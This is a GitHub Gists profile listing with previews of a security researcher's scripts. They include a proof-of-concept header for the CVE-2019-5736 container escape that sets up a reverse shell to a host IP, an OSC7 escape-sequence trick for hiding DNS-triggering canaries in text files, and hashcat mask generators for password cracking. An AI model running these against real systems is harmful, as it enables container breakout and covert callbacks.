Skip to content

Instantly share code, notes, and snippets.

View singe's full-sized avatar

Dominic White singe

269 followers · 0 following
View GitHub Profile
@singe
singe / agenda_tracker.xlsx
Last active February 8, 2024 06:44
An agenda planner and time tracker
@singe
singe / mirror.sh
Created August 18, 2023 09:18
A quick 'n dirty website mirror script
#!/bin/sh
# A quick 'n dirty website mirror script
# by @singe
# Ideally, wget -r should mirror a site, but modern websites are complex, this
# tries to fix the gaps of what is typically mixed.
# It's been tested on 3 or 4 sites, and likely needs more tricks added.
sourcedomain="$1"
depth="$2"
@singe
singe / Readme.md
Last active August 12, 2023 15:32
Using OSC7 to trigger a canary token in text files

Using OSC7 to trigger a canary token in text files

macOS' Terminal.app supports the OSC7 escape code for notifying the terminal of the current working directory. It also supports the file:// URL scheme. This means you can embed a hostname in the instruction, and the host will perform a DNS lookup against it. It also won't visibly render in the terminal.

You can create the escape code like this: printf '\033]7;file://<hostname>\033\\'

I tested Terminal.app, Microsoft command shell, Windows Terminal and Alacritty and it only worked on Terminal.app. OSC7 support is contentious across other terminals according to various pull request discussions.

This was discussed in @stokfredrik's BlackHat/Defcon 2023 talk https://i.blackhat.com/BH-US-23/Presentations/US-23-stok-weponizing-plain-text-ansi-escape-sequences-as-a-forensic-nightmare-appendix.pdf

@singe
singe / date-since.py
Created July 11, 2023 17:12
A simple “date since” tracker with milestones for Pythonista
import datetime
import ui
v = ui.load_view()
width, height = ui.get_screen_size()
v.frame = (0, 0, width, height)
v.present('sheet')
first = datetime.datetime(2023, 1, 1, 0, 0, 0, 0)
@singe
singe / hashcat_maskgen.sh
Created April 17, 2023 11:16
Generate a list of hashcat masks from a wordlist
#!/bin/bash
# hashcat mask generator
# by @singe
infile="$1"
outfile="$1.freq.masks"
outfile2="$1.length.masks"
tmp=$(mktemp)
@singe
singe / cve-2019-5736.py
Last active April 30, 2023 06:18
PoC for CVE-2019-5736 in Python
#!/bin/python3
# Silly PoC for CVE-2019-5736 in Python by @singe (with help from @_staaldraad, @frichette_n & @_cablethief)
# Target will need a python3 interpreter
# Edit IP info below, on the host run a netcat to catch the reverse shell
# Run this python file in the container
# Then from the host: docker exec -i <container name> /tmp/evil
import os
import stat
host='172.17.0.1'
@singe
singe / inplace-maskgen.sh
Last active April 19, 2023 17:37
Convert clear passwords into slightly more generalised brute force masks for hashcat mode -a3
#!/bin/sh
file="$1"
tmp=$(mktemp)
# change specials & digits to hashcat format
sed -e "s/[[:punct:]]/?s/g" \
-e "s/[[:digit:]]/?d/g" \
$file \
> $tmp \
&& \
@singe
singe / create_certs.sh
Last active November 18, 2022 20:22
A simple tshark EAP certificate extractor
#!/bin/bash
# Simple CA cert generator & leaf cert signer
# By dominic@sensepost.com
# All rights reserved 2019
ca_prefix="ca"
leaf_prefix="host"
ca_validity="1825" #days
leaf_validity="730" #days
size=2048
@singe
singe / README.md
Last active November 7, 2022 19:06
Canarytoken'ed Word .docx yara rule

Remember to unzip the .docx first, or use scan.sh.

Compile the yara rule for scan.sh to work yarac canarytoken.yar canarytoken

@singe
singe / request-proxy-facebook.py
Last active October 1, 2022 23:30
Simple Python requests to browser reverse proxy example.
#!/usr/bin/env python3
# A simple demo of Python requests to reverse proxy
# It's an intermediate between vanilla requests and Selenium
# It let's you interact programatically, but still run JS in
# the browser, without Selenium overhead
#
# This is an example of automating aspects of Facebook
#
# by @singe